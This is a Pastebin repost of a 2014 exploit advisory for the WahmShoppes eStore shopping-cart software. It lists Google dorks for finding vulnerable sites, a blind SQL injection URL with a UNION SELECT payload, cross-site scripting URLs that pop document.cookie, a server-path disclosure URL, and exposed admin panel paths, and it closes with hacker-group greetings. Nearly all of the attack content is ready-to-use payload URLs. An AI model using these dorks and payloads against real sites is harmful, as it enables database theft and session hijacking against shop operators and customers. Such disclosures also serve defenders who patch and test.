API tools faq
paste
Advertisement
Mayk0

#; WahmShoppes eStore Cross Site Scripting / SQL Injection

Mayk0
Jun 7th, 2014
340
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.91 KB | None | 0 0
raw download clone embed print report
  1. Full title WahmShoppes eStore Cross Site Scripting / SQL Injection Vulnerabilities
  2. Date add 2014-06-07
  3. Category web applications
  4. Platform php
  5. Risk [<font color="#FF0000">Security Risk Critical</font>]
  6. Description WahmShoppes eStore suffers from cross site scripting, information disclosure, and remote SQL injection vulnerabilities.
  7. ===================================================
  8.  
  9. #+++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  10. # Title : multiple Vulnerability in "WahmShoppes eStore"
  11. # Author : alieye
  12. # vendor : http://www.wahmshoppes.com/
  13. # Contact : cseye_ut@yahoo.com
  14. # Risk : High
  15. # Class: Remote
  16. # Google Dork:
  17. # inurl:WsError.asp
  18. # inurl:store/ We apologize but your request rendered no results
  19. # Version: all version
  20. # Date: 05/06/2014
  21. #++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  22.  
  23. 1-Blind SQL Injection
  24.  
  25. http://victim.com/store/WsDefault.asp?One=-999 AND 1=1+UNION+SELECT+...etc
  26. ---------------------------------------------------------
  27.  
  28. 2-Cross Site Scripting
  29.  
  30. http://victim.com/store/WsError.asp?msg=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
  31. http://victim.com/store/WsRequestpwd.asp?msg=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
  32. ---------------------------------------------------------
  33.  
  34. 3-Information Disclosure in image location
  35.  
  36. http://victim.com/store/thumb.asp?path=X:/server path and domain name/example.jpg
  37. ---------------------------------------------------------
  38.  
  39. 4-show admin panel tools
  40.  
  41. http://victim.com/store/frmLeft.asp
  42. ---------------------------------------------------------
  43.  
  44. Admin page
  45.  
  46. http://victim.com/store/admin/Default.asp
  47.  
  48. #++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  49. [#] Spt Tnx To ZOD14C , 4l130h1 , bully13 , andelos , 3.14nnph , f4rm4nd3 and all cseye members
  50. [#] Thanks To All Iranian Hackers
  51. [#] website : http://cseye.vcp.ir/
  52. #++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!